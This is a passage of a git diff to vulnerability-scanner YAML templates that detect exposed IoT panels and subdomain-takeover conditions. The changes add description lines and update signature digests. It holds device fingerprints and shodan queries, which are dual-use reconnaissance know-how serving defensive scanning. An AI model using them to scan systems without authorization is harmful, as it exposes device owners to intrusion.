diff --git a/http/iot/ampguard-wifi-setup.yaml b/http/iot/ampguard-wifi-setup.yaml
index 615ee0da82..66cd41b90e 100644
--- a/http/iot/ampguard-wifi-setup.yaml
+++ b/http/iot/ampguard-wifi-setup.yaml
@@ -4,6 +4,7 @@ info:
   name: AmpGuard Wifi Setup
   author: pussycat0x
   severity: info
+  description: AmpGuard wifi setup panel detected.
   metadata:
     verified: true
     max-request: 1
@@ -25,5 +26,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a00463044022003d09fac7c970aab42db38edc938b1c8c2369688cea752aab8a9511849c17f5802203cb1d026593e807acfe7dacbaed0769723656d131e20c7faa71a51c4e0e0af48:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d4a3cb12fcee3738ca5f49ef572ccb813ae3b2a4376c51ead505f958f5c6769c022100a3fda6aba76d72daa14a29577b2e82809ef414d063776383e5bb38fe7b9cef00:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/brother-printer-detect.yaml b/http/iot/brother-printer-detect.yaml
index dbb9897c9c..b8ef274797 100644
--- a/http/iot/brother-printer-detect.yaml
+++ b/http/iot/brother-printer-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: Brother Printer
   author: pussycat0x
   severity: low
+  description: Brother Printer panel was detected.
   reference: https://www.exploit-db.com/ghdb/6889
   metadata:
     max-request: 1
@@ -23,5 +24,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100945d34d649d2e95395b4eba1aeb5b9836293fc0c4c77ce544c386b09819edf8002210093710cfc5664466288207678d81d1f46001f60f310af635ec35b9abf5e18b8d8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203d8f8adebe04f15e34570bd16f0569a8d23f419455606dbc358deddb246a7b2d022100e7abe86feee995aa9bd2ce988c4d02bab20115ac9cd1fec8c09777e7c24df1c9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/brother-unauthorized-access.yaml b/http/iot/brother-unauthorized-access.yaml
index c57d504fb3..2dc03c2fc8 100644
--- a/http/iot/brother-unauthorized-access.yaml
+++ b/http/iot/brother-unauthorized-access.yaml
@@ -4,6 +4,7 @@ info:
   name: Brother Printer
   author: pussycat0x
   severity: medium
+  description: Brother Printer unauthorized access was detected.
   reference: https://www.exploit-db.com/ghdb/6889
   metadata:
     max-request: 1
@@ -25,5 +26,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100bc48aa1c015d7454147e9553d8c430f7a53e2888d1184923895f4f8c24f695e302201cf12a115bccdd3e47356f9ffe206676937b6d2d14841de4ba2ad78bd7a4da7f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210095a8a5f984c561df996f81b5a19ddd95959da928e993070f440db0df95d696e602205dbb5ddc12a171f609033db9c56f7f48cd53aed6c75a601a3897925996346a82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/carel-plantvisor-panel.yaml b/http/iot/carel-plantvisor-panel.yaml
index 7b385085e6..7d00e8f5c2 100644
--- a/http/iot/carel-plantvisor-panel.yaml
+++ b/http/iot/carel-plantvisor-panel.yaml
@@ -4,6 +4,7 @@ info:
   name: CAREL Pl@ntVisor Panel
   author: Hardik-Solanki
   severity: info
+  description: Carel plantvisor panel was detected.
   metadata:
     max-request: 1
     shodan-query: title:"CAREL Pl@ntVisor"
@@ -26,5 +27,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a0046304402202073d91492cb50e9f368dfa7a5962594be943282b2753a07ec9bb2bba420534d02206bf50d0c0b4142b7613a7a3418a6a13b38c4a527dbcfcfb85b4bb99f8be697c7:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100d73310caca64abb7275ff750c54c02e8d897b9a5bc6305a6277921adda574db1022100986cc768367fafcee602e3c952a1861eb0d6bfe7dacd532fbff5155c5527e614:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/grandstream-device-configuration.yaml b/http/iot/grandstream-device-configuration.yaml
index bdeac4d854..6a02ad33e7 100644
--- a/http/iot/grandstream-device-configuration.yaml
+++ b/http/iot/grandstream-device-configuration.yaml
@@ -4,6 +4,7 @@ info:
   name: Grandstream Device Configuration
   author: dhiyaneshDK
   severity: info
+  description: Exposed Grandstream device configuration page detected.
   metadata:
     max-request: 1
     shodan-query: http.title:"Grandstream Device Configuration"
@@ -23,5 +24,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502203245254e3e965154e96525c471e737ac450964c166454b5ea574cdaf245575d0022100e7c232c6678d651e5e8f6d35f158f1f480351c5536cb3fc5915b61c199bf41b0:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c1185f8d776754c9a70431024fd52aa8d0eda89e1add045809bcc28ca4a673c0022100c3c467a3ce2d09fc8fec4b3b803dc3b69a656094debd6fc13f7dd48612f8dc69:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/homeworks-illumination.yaml b/http/iot/homeworks-illumination.yaml
index af3da4a94d..6d6e97d028 100644
--- a/http/iot/homeworks-illumination.yaml
+++ b/http/iot/homeworks-illumination.yaml
@@ -4,6 +4,7 @@ info:
   name: HomeWorks Illumination Web Keypad
   author: geeknik
   severity: low
+  description: HomeWorks Illumination Web Keypad panel was detected.
   reference:
     - https://www.lutron.com
   metadata:
@@ -28,5 +29,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502201d99f8763b6e653c7da3b85f266ad5c380a9c84f4d332a24e13bb0142340b371022100a6f0d18af86e985cffc180f08414b82942754996097d4fc58f0ad39cc23ba6bc:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502210091557bc1a16e87b5ddeda1a0111ba1a89bd5a3ca4a905f97e3463ef2b197e1c50220409364bec1cc83a423c085c183fb9d8125887bc71971bae414f8e897d20c57a3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/honeywell-building-control.yaml b/http/iot/honeywell-building-control.yaml
index f37d6ea7c4..72b76e1068 100644
--- a/http/iot/honeywell-building-control.yaml
+++ b/http/iot/honeywell-building-control.yaml
@@ -4,6 +4,7 @@ info:
   name: Honeywell Building Control
   author: dhiyaneshDK
   severity: info
+  description: Honeywell Building control panel was detected.
   metadata:
     max-request: 1
     shodan-query: html:"Honeywell Building Control"
@@ -23,5 +24,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100dd904904c7977f0d9ffeb5529f4746186319f09935aee7676a2e05a9348fd11e02202cd248fcd464a063b0bf417c81d02cb0380a1a6ac914aaaa80ec5d9c216ba099:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100a83eac085f1d018323994ca14922711cde37cd4d7f1a5c36a7e2fae8813cfa49022028a03cc74e28741faa1e9761f3540241c58eb11189cb9d2f5fc5743ac187416c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/hp-color-laserjet-detect.yaml b/http/iot/hp-color-laserjet-detect.yaml
index 1ff7cbdbd7..23ac17eabd 100644
--- a/http/iot/hp-color-laserjet-detect.yaml
+++ b/http/iot/hp-color-laserjet-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: HP Color LaserJet Detection
   author: idealphase,gy741
   severity: info
+  description: HP color laserJet panel was detected.
   reference:
     - http://www.hp.com/
     - https://www.hp.com/us-en/shop/cv/printers
@@ -44,5 +45,4 @@ http:
         group: 1
         regex:
           - '<td class="mastheadTitle"><h1>HP Color LaserJet (.+)<\/h1><\/td>'
-
-# digest: 490a004630440220451f07c67fecba072fedcdfd3fd6517153311e5f360ea2efee91bd0404bc8c0e022023e00f2ca1cdef002b63b0f89c78299a208136344c9cf47492e0ca8ad29948f3:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402200f946e9f26ce87e308fed44cf7b4ca6ec77672785bdb1610157e7a12ae75118d02202b5461ac88cd30c05cd94068eae230b5342938dfc2d64723c21510a874287ce9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/huawei-home-gateway.yaml b/http/iot/huawei-home-gateway.yaml
index ad7b5eba53..609f1228ec 100644
--- a/http/iot/huawei-home-gateway.yaml
+++ b/http/iot/huawei-home-gateway.yaml
@@ -4,6 +4,7 @@ info:
   name: HUAWEI Home Gateway HG658d
   author: dhiyaneshDK
   severity: info
+  description: HUAWEI Home Gateway panel was detected.
   metadata:
     max-request: 1
     shodan-query: http.title:"HUAWEI Home Gateway HG658d"
@@ -23,5 +24,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a0047304502203dd26ee0c8b8f178042c7320b715db5b19a520d8af021cbcfef6f4af31b7131a022100bef207fc6a74e917243597441e804d6fd4aefe83f8b419f61339f8d75e444b89:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207687d65261f0adcb8917eb8c0a9c7e8607cb6fa8e869434fc7eed007d6f9890f022100c936284c8cc1fac5f4f3bedd7c53f0ddcf9156a099b9bc7ce177a61042e0ca01:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/hue-personal-wireless-panel.yaml b/http/iot/hue-personal-wireless-panel.yaml
index 52bf68cb7c..6ad184ca79 100644
--- a/http/iot/hue-personal-wireless-panel.yaml
+++ b/http/iot/hue-personal-wireless-panel.yaml
@@ -4,6 +4,7 @@ info:
   name: HUE Personal Wireless Lighting Panel
   author: Hardik-Solanki
   severity: info
+  description: HUE personal wireless lighting panel was detected.
   metadata:
     max-request: 1
     shodan-query: title:"hue personal wireless lighting"
@@ -26,5 +27,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a0046304402205a9615bf731d5964ac4bf64322f709915fa60ef709c5f491b0dcbea92fc5889a022072ae610d494923f016b4f1fad6d6adcc8f6236646701c119f5b1044ad847aaf8:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502200ce99a330b051d9b5422b795b8aebf4e359f23b0d128e3291dff6647d18a31ce022100cb28be55fdb18f472419448524da9b7ac273a47bfb378d9a9b2703d2c261e59c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/loytec-device.yaml b/http/iot/loytec-device.yaml
index 75fc946833..74658391af 100644
--- a/http/iot/loytec-device.yaml
+++ b/http/iot/loytec-device.yaml
@@ -4,6 +4,7 @@ info:
   name: Loytec Device Info Detection
   author: pussycat0x
   severity: info
+  description: Loytec Device info panel was detected.
   metadata:
     verified: true
     max-request: 1
@@ -26,5 +27,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 490a0046304402207b022c9b325ce140c946d508a5d505cb7df0a6e636da06046316135c2f50104d02207aed5e93676d511b23e507f19dc9bb8ab3811c5704e09c6a0b97f13094e3862e:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100e3d2aed4c3c31c558f094ead6ee0e120da77d623f7951bca70c1e48fc4539e81022100abaaceec70b5e2dc59b778526a16d89eae8661ffe48a96a846279bb83edb62f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/network-camera-detect.yaml b/http/iot/network-camera-detect.yaml
index 353bed442d..23aca92e25 100644
--- a/http/iot/network-camera-detect.yaml
+++ b/http/iot/network-camera-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: Various Online Devices Detection (Network Camera)
   author: iamthefrogy
   severity: info
+  description: Network camera panel was detected.
   metadata:
     max-request: 1
   tags: iot
@@ -19,5 +20,4 @@ http:
       - type: word
         words:
           - <TITLE>Network Camera</TITLE>
-
-# digest: 4a0a004730450220136bbdc422d67c75d630bdb3fb415979e8df7b115dd98e6bd340e417395a23d1022100b91ebbd4415e96886e0e84146b075965b32ec11e2f17dc62153555d34d1c476f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502207fb7c2cb3d217be9f33cef8fa09e344c4c42f800059438ff36c49b56150b4c54022100c8696b8dc17dbb77732051fd5840306ae119630de38669f0954bf5c5f3fe544e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/pqube-power-analyzers.yaml b/http/iot/pqube-power-analyzers.yaml
index e602af0151..8efc7ef58c 100644
--- a/http/iot/pqube-power-analyzers.yaml
+++ b/http/iot/pqube-power-analyzers.yaml
@@ -4,6 +4,7 @@ info:
   name: PQube 3 Power Analyzers
   author: pussycat0x
   severity: low
+  description: PQube 3 Power Analyzer panel was detected.
   metadata:
     verified: true
     max-request: 1
@@ -27,5 +28,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100effd6393821fbecdcd828a2ec87ff58655cbc104ca883d87c306779b15067ea702200b1c88467b7ed4243394875f1d4884d98decba2d49aaae38ffc9034d96fa4de9:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022061d9b350876cb4918caef0fe50530dfbe165e1613526bb0226db4a3347d99e64022100efd3b6b8457086857859d07bfb153cf7e70666080e85023d9c889a8fb419275f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/snapdrop-detect.yaml b/http/iot/snapdrop-detect.yaml
index a43cbd2ca0..032701557b 100644
--- a/http/iot/snapdrop-detect.yaml
+++ b/http/iot/snapdrop-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: Snapdrop Detect
   author: tess
   severity: info
+  description: Snapdrop panel was detected.
   metadata:
     verified: true
     max-request: 1
@@ -25,5 +26,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100fcda1647cf3564335b3680eb0e92f6886e51b7269d1aa551f0b5d6a9c0c5b3b2022100d21c83b3a4b3e1349603c6377c073ef6549dae44e005e0acd677970cdca8aa6c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502203ef2a94e84eedc2d83887a22bef4a5c5be670d4427151915124206dc14c87d4e022100b0bbd406dd7718f3d1231fe8d3dd3636b1077a8dc77332d27b308396e53c7a1e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/stem-audio-table-private-keys.yaml b/http/iot/stem-audio-table-private-keys.yaml
index 16c14177f0..e20d3790ff 100644
--- a/http/iot/stem-audio-table-private-keys.yaml
+++ b/http/iot/stem-audio-table-private-keys.yaml
@@ -4,6 +4,7 @@ info:
   name: Detect Private Key on STEM Audio Table
   author: gy741
   severity: high
+  description: Private Key on STEM audio table was detected.
   reference:
     - https://blog.grimm-co.com/2021/06/the-walls-have-ears.html
   metadata:
@@ -28,5 +29,4 @@ http:
       - type: dsl
         dsl:
           - '!contains(tolower(body), "<html")'
-
-# digest: 490a0046304402201581884fea6e5c138a48d6ac4dde092d28786422db7565268a81772900770462022060ff595c4e18ef0d24047e0e3e32d7ac5279d26789c00bd38ef02012a5e20a18:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022054308561f54175155ddf8e07310c9bf22d8e1ba62e134939d40b567295fe59ad02201b276c6cfe491ad9f648a41b70daba33cd59765d9f4d8e7a2eadb2c1ba90c76c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/ulanzi-clock.yaml b/http/iot/ulanzi-clock.yaml
index 68fc6b722f..5c74c36f7d 100644
--- a/http/iot/ulanzi-clock.yaml
+++ b/http/iot/ulanzi-clock.yaml
@@ -4,6 +4,7 @@ info:
   name: Ulanzi Clock Detect
   author: fabaff
   severity: info
+  description: Ulanzi Clock panel was detected.
   metadata:
     max-request: 1
   tags: panel,ulanzi,iot
@@ -23,5 +24,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100eb2eb0ec2d28b58609a194d0d92dc90cf172dc7d5c3ac4986fab7e9b3110ab56022100d8ef58c992c480152a5e86c43280ff07030fdbe18fa02d3eec6498dce3a2c2ae:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201663a57adc62f7254afbcde4d6b9264b3eb43686659e918e7ce17f02aa6de342022100e0a53cb58a03f10a2594abf21d472200bdca71155b24f5ddc5e60465ecb7ecc3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/upnp-device.yaml b/http/iot/upnp-device.yaml
index b4417d27b0..03b021859a 100644
--- a/http/iot/upnp-device.yaml
+++ b/http/iot/upnp-device.yaml
@@ -4,6 +4,7 @@ info:
   name: Detect Basic uPNP Device
   author: geeknik
   severity: info
+  description: uPNP Device was detected.
   reference:
     - https://www.upnp.org/specs/basic/UPnP-basic-Basic-v1-Device.pdf
   metadata:
@@ -35,5 +36,4 @@ http:
         regex:
           - <modelName>.*</modelName>
           - <modelNumber>.*</modelNumber>
-
-# digest: 4a0a004730450221009b08feba1ff7ba79ba527cbc2ba568c26fccd5d92b4568898ce285508088eb01022008d02f14ba4d203b3bc5bfccd9a7bf0f08299e4034f32c135ea0c7b0ba22067e:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220358ff4d12799f686f407cc2317ae6e1a4db0d2e5d8c9616c524da1267c99a499022006efa9286c5ec0d751f2c4cbb819ae721d119a25fba4b06e4077ff88b204b64d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/webtools-home.yaml b/http/iot/webtools-home.yaml
index 86f88c2502..6dc81bc57a 100644
--- a/http/iot/webtools-home.yaml
+++ b/http/iot/webtools-home.yaml
@@ -4,6 +4,7 @@ info:
   name: Webtools Home
   author: dhiyaneshDK
   severity: info
+  description: Webtools panel was detected.
   metadata:
     max-request: 1
     shodan-query: http.title:"Webtools"
@@ -23,5 +24,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4b0a00483046022100f3d6b75a7638a8769657a5da18f42513fd5adbe8220a9f58a13e6c00a144e09d02210089d21a4e51c19e50caab6f6e1dfa4465d9b6062bc1e341b31321780bbc40be4b:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502201c7e6b7583088aeea79e926ebb24b930e333ee8d78ff806f25ea656de19a27bf022100801ac298af93589b6e35e12f961d8afea748cfcb81ada6acb6d4ca570e0b8dff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/iot/zebra-printer-detect.yaml b/http/iot/zebra-printer-detect.yaml
index f860846dd3..620b68d6af 100644
--- a/http/iot/zebra-printer-detect.yaml
+++ b/http/iot/zebra-printer-detect.yaml
@@ -4,6 +4,7 @@ info:
   name: Zebra Printer Detect
   author: gy741
   severity: info
+  description: Zebra Printer panel was detected.
   reference:
     - https://www.zebra.com/kr/ko/products/printers.html
   metadata:
@@ -29,5 +30,4 @@ http:
       - type: status
         status:
           - 200
-
-# digest: 4a0a00473045022100912f0f38f8f05f1a6c50390fcee4c18451ee4a88639b16917ef1339c616283de02201e35e3fb85eb49824ed45de8687d0e1562f5a47d9432f4db40f45d21dbef97ff:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206b4bee6bb842af88daf29023d61c1696dd19f32c479e516ca00dad284abbe97a022100eaff461770fad8ee9f38e10b6cf918a85b5e58312662167fb57205f713ecbfcb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/airee-takeover.yaml b/http/takeovers/airee-takeover.yaml
index 9f2aabee26..4c96c9344a 100644
--- a/http/takeovers/airee-takeover.yaml
+++ b/http/takeovers/airee-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Airee Takeover Detection
   author: pdteam
   severity: high
+  description: Airee takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/104
   metadata:
@@ -25,5 +26,4 @@ http:
         name: airee
         words:
           - 'Ошибка 402. Сервис Айри.рф не оплачен'
-
-# digest: 4a0a0047304502206bc39d108c5f38f1a868cdda50cfd6d42b450d17d02eda754d300c7d1426a61602210083231525cf7708aa349e9f2b500f66b72bc8e37bc4b8e97b1ce06312c719f236:922c64590222798bb761d5b6d8e72950
+# digest: 480a0045304302201fceaf9dc7e08c32388d3b25f15a78412295bf2d92087a506409f47b869448bd021f0b2d66db8da614dd8fafccc4e5bf7d5b7913386a434495fb55e2d1c0662a32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/anima-takeover.yaml b/http/takeovers/anima-takeover.yaml
index 06da112582..f820ee60ca 100644
--- a/http/takeovers/anima-takeover.yaml
+++ b/http/takeovers/anima-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Anima Takeover Detection
   author: pdteam
   severity: high
+  description: Anima takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/126
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - "If this is your website and you've just created it, try refreshing in a minute"
-
-# digest: 4b0a00483046022100ebcb1cc666be178493a4506b44051641b01fc9fd016169ce42ec261bc0b7f91b02210095d4adbada967e7207241acf1a920578464667cd4470f0568bd678ffc27de046:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100dc61f6f23fb5b89280618c559a5a94234bd675ee6529ce314614fdaef00723c202205ca59abbb43ac8b43633f12437e8e3871234c8df3a8be291a2890e95ada73b68:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/announcekit-takeover.yaml b/http/takeovers/announcekit-takeover.yaml
index 02b69d323a..a1f467385d 100644
--- a/http/takeovers/announcekit-takeover.yaml
+++ b/http/takeovers/announcekit-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Announcekit Takeover Detection
   author: melbadry9
   severity: high
+  description: Announcekit takeover was detected.
   reference:
     - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228
@@ -29,5 +30,4 @@ http:
       - type: status
         status:
           - 404
-
-# digest: 4a0a00473045022050354afe6fbe6d56be6ce179a056e366eb6e1a7de68cc817b5001663652f7659022100e4a4f4404fdaedc49f90d06aaab394832508f88c79505cd24b3256dbe5f8c07d:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a004730450220411ce0a310d41e6a13fec4c4e48258ef47b6f97caa6f60fe2dbedf33aac7b52b022100db40ab50a70f049a2baf180b003297fbe4e98aef554cd1c625616f1a7ae9a82d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/aws-bucket-takeover.yaml b/http/takeovers/aws-bucket-takeover.yaml
index a34b60653a..30594f15cc 100644
--- a/http/takeovers/aws-bucket-takeover.yaml
+++ b/http/takeovers/aws-bucket-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: AWS Bucket Takeover Detection
   author: pdteam,pwnhxl,zy9ard3
   severity: high
+  description: AWS Bucket takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/36
   metadata:
@@ -76,5 +77,4 @@ http:
         regex:
           - '<li>BucketName: (.*?)</li>'
           - '<BucketName>(.*?)</BucketName>'
-
-# digest: 490a004630440220552d119ed4defe335fcb706a07cd57859f985baf36b33e4ae1427569f10fbf6a022049b852ee41be1c370327d28658a18e80d90306749e35f501d4ebe44440805b4e:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022052c03d64bf92ed3e2156360f7da406ef950a4292a8d29b08de54d645483122e1022100a8172443bfd3c3b235f40e2963f3f37d538106e9004629cd1393c789bfb7983c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/bigcartel-takeover.yaml b/http/takeovers/bigcartel-takeover.yaml
index 9ec4d4b480..70e23f7ba1 100644
--- a/http/takeovers/bigcartel-takeover.yaml
+++ b/http/takeovers/bigcartel-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Bigcartel Takeover Detection
   author: pdteam
   severity: high
+  description: Bigcartel takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/158
   metadata:
@@ -28,5 +29,4 @@ http:
       - type: dsl
         dsl:
           - '!contains(host,"bigcartel.com")'
-
-# digest: 4b0a004830460221008fa1fa703d65daae1e6844150e93e1d1f4c742bac464f1dc71fad481916a7471022100da879f316dab98afd14c9a9c925aef54e2c398dc45bc98488fefa14dd8c17fbe:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100925b0be6cfcab185f932f0f073603f7240331485b0bc86ef326a6200d00be8f6022100fb1f27f39b22bb7b171bed7a45741877556f338a31086be1ad116d66d62f4670:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/bitbucket-takeover.yaml b/http/takeovers/bitbucket-takeover.yaml
index e93be7cca6..7f71cdc8e5 100644
--- a/http/takeovers/bitbucket-takeover.yaml
+++ b/http/takeovers/bitbucket-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Bitbucket Takeover Detection
   author: pdteam
   severity: high
+  description: Bitbucket takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -30,5 +31,4 @@ http:
         words:
           - "text/plain"
         part: header
-
-# digest: 490a0046304402205b7987c056997dd8161cbd726a93029f3a2d206d66578330bd5fba78acdbb0b302201841488659a4fbf01a69e02d721787a50df41e386528a826981c64d5c2154306:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c094e34cf6d07e1c771f27f42193b0798c3a060af2d82d2d9bdd68976a43314c0221008e9f7aa2de005c4d1aaa61c13c0f932d5fad0e3293793f601cfed2bb8b49dba6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/campaignmonitor-takeover.yaml b/http/takeovers/campaignmonitor-takeover.yaml
index 02c9e9067c..370db8a3d9 100644
--- a/http/takeovers/campaignmonitor-takeover.yaml
+++ b/http/takeovers/campaignmonitor-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: CampaignMonitor Takeover Detection
   author: pdteam
   severity: high
+  description: CampaignMonitor takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/275
   metadata:
@@ -26,5 +27,4 @@ http:
           - '<strong>Trying to access your account?</strong>'
           - 'or <a href="mailto:help@createsend.com'
         condition: and
-
-# digest: 4b0a00483046022100c5c6a5555603547a572b7f04b27de86820bad3ce19bb84ad46a607f0f6b2703e022100df80f1574a570de0bced875c024e6c5f6b0816d090395a7ee9e94685b821ee9b:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100819a18f9b86c9ddae6d1d8e7d0d7088f961b901bbf64ed52caa6d0d7d0700157022100d61fd5a1bc6a2d4b6df76ffeab57fb65851dd176ebd9eb7ec62559c646d99a98:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/canny-takeover.yaml b/http/takeovers/canny-takeover.yaml
index 026a138e15..84e9b60b0e 100644
--- a/http/takeovers/canny-takeover.yaml
+++ b/http/takeovers/canny-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: Canny Takeover Detection
   author: pdteam
   severity: high
+  description: Canny takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/114
   metadata:
@@ -26,5 +27,4 @@ http:
           - 'Company Not Found'
           - 'There is no such company. Did you enter the right URL?'
         condition: and
-
-# digest: 4b0a00483046022100b7a6412ce1ae5218323cad686a7e510a47b47fb7f0fb156de18dd8383fc71f3c0221008a111f421e20993b5bbca7537801f838fe8dc3bbd48007a3cc7ccb094b74d99f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100e95e874db3fb64d398f7de9bf94384f2c59ae0fe2fb2d336f6f1e9ceb1b5198702204ffcbe8c8a191927de05681b857f561e8a2d5c662d505c009fc0e26db4bb65b0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/cargo-takeover.yaml b/http/takeovers/cargo-takeover.yaml
index d9ca29971f..ab15a8d5a5 100644
--- a/http/takeovers/cargo-takeover.yaml
+++ b/http/takeovers/cargo-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: cargo takeover detection
   author: pdteam
   severity: high
+  description: cargo takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz
   metadata:
@@ -24,5 +25,4 @@ http:
       - type: word
         words:
           - "If you're moving your domain away from Cargo you must make this configuration through your registrar's DNS control panel."
-
-# digest: 490a00463044022063002e0d559589db450c5b06128fcca3e6392ac9b918d75ca9716a354a7cb5e902202d21a54f0f328288de64722b1bb401d6260a124e2cf0512d799e0da311b70481:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c56264fb56e062874dcaa3d5bf5d6d893f542f6cb6a0dc08812796bc8364ef7f022100fc1b0425d42fabb17822a50bf092be6557a2205913a9b38e9fd7b549cb4eee7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/cargocollective-takeover.yaml b/http/takeovers/cargocollective-takeover.yaml
index 76cd83c03f..dcd8d35bd2 100644
--- a/http/takeovers/cargocollective-takeover.yaml
+++ b/http/takeovers/cargocollective-takeover.yaml
@@ -4,6 +4,7 @@ info:
   name: CargoCollective Takeover Detection
   author: pdteam
   severity: high
+  description: CargoCollective takeover was detected.
   reference:
     - https://github.com/EdOverflow/can-i-take-over-xyz/issues/152
   metadata:
@@ -26,5 +27,4 @@ http:
           - '<div class="notfound">'
           - '404 Not Found<br>'
         condition: and
-
-# digest: 4a0a0047304502202627dc2696e651d9bd9ab4f4324404b0f8d13be1f525839ef50b784fd3ffa1b6022100860761bb0dff67b62c317a99b2f63aaada22a32257181f164e9da6b65ec63ee6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502206e3e3a36081a8592520a2de1a112710b7bc015cccef9821507fc0064e33d7b780221008d1ad7b1bbc8e7687d2c8efe1be0fb64bf95a3402f36ba08bb4a2576ab6d7fff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/takeovers/flexbe-takeover.yaml b/http/takeovers/flexbe-takeover.yaml
